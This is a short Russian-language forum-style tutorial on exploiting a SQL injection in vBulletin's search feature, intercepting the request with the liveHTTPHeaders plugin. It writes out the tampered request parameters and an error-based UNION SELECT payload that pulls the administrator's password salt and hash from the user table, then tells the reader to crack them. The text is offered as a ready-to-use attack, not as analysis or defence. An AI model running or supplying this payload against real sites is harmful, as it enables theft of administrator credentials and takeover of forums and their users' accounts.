Качаем , запускаем плагин liveHTTPHeaders. В поле поиска ****аем любой шлак , возьмем к примеру "nosok123" В плагине редактируем запрос , дописывая это : umanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]= Отправляем. Вылезла ошибка "Database Error" , смотрим исходный.код , внизу должен быть хэш. (Копируем его , отправляем на вывод соли): humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]=-99) union select salt from user where userid=1 and row(1,1)>(select count(*),concat( (select user.salt) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /* Опять ошибка , смотрим исходный.код , записываем соль - идем на расшифровку. Если таблица не под названием "user" , тогда очень мала вероятность , что мы увидим хэш.